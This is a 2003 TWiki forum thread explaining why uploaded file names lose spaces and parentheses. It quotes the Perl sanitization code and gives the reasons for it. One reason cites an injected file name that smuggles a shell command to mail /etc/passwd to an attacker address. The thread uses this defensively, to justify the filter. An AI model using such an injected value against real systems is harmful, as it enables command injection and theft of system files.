Question
Uploaded files have their names changed. Spaces and parentheses, in particular, are stripped out.
- e.g., "03-426, 26-Apr-03 (ABC).doc" -> "03-42626-Apr-03ABC.doc"
I have not been able to find anything about this online. Am I missing something?
- TWiki version: 01 Feb 2003
- Perl version: 5.6.1
- Web server & version: Apache 1.3.23
- Server OS: Linux (Red Hat)
- Web browser & version: MIE 5.5
- Client OS: Win Me
--
AlexLane - 27 Apr 2003
Answer
This is controlled by the following code in
CVSget:bin/upload, ensuring valid filenames on all platforms and when used in a URL without special encoding:
# Delete unwanted characters from filename, with I18N
my $nonAlphaNum = "[^${TWiki::mixedAlphaNum}" . '\._-]+';
$fileName =~ s/${nonAlphaNum}//go;
$fileName =~ s/$TWiki::uploadFilter/$1\.txt/goi; # apply security filter
--
PeterThoeny - 30 Apr 2003
In this regard, I have a question and a comment.
Question: Could you summarize (or point to a source that summarizes) what risks one faces by commenting out the line in the code that strips out non-alpha chars?
Comment: I've worked some with a groupware application called PHProjekt, which resembles TWiki in that it has a feature to permit file uploads/downloads. What PHProjekt does is mangle the file name so that the name in the directory is something unintelligible, but users see the real file name in their browsers.
So, how difficult would it be to do something similar in TWiki, i.e., to retain and store the original file name as metadata, for purposes of display and download, so that for example, the file
This file has a corporate name format.doc
is stored as
Thisfilehasacorporatenameformat.doc
but shown on the page with its original name and downloaded similarly? Would this be implementable as a Plugin?
--
AlexLane - 13 May 2003
On your
Question: There are several reasons: 1. The file needs to have a valid name on all platforms where TWiki is being installed. 2. An attached file may only contain characters valid in a URL since it can be referenced by URL, e.g.
%ATTACHURL%/picture.jpg
. 3. Security precaution to prevent attacks like
file with odd chars; mail /etc/passwd hacker@evilplace.org
. 4. Ease of implementation, e.g. no extra handling for files with spaces.
On your
Comment: Certainly a possibility. See attached sample file
testfilewithspace.txt
, click on Diffs to see the topic meta data. The
path
attribute contains the original file name with space. TWiki could be tweaked to return
test%20file%20with%20space.txt
--
PeterThoeny - 16 May 2003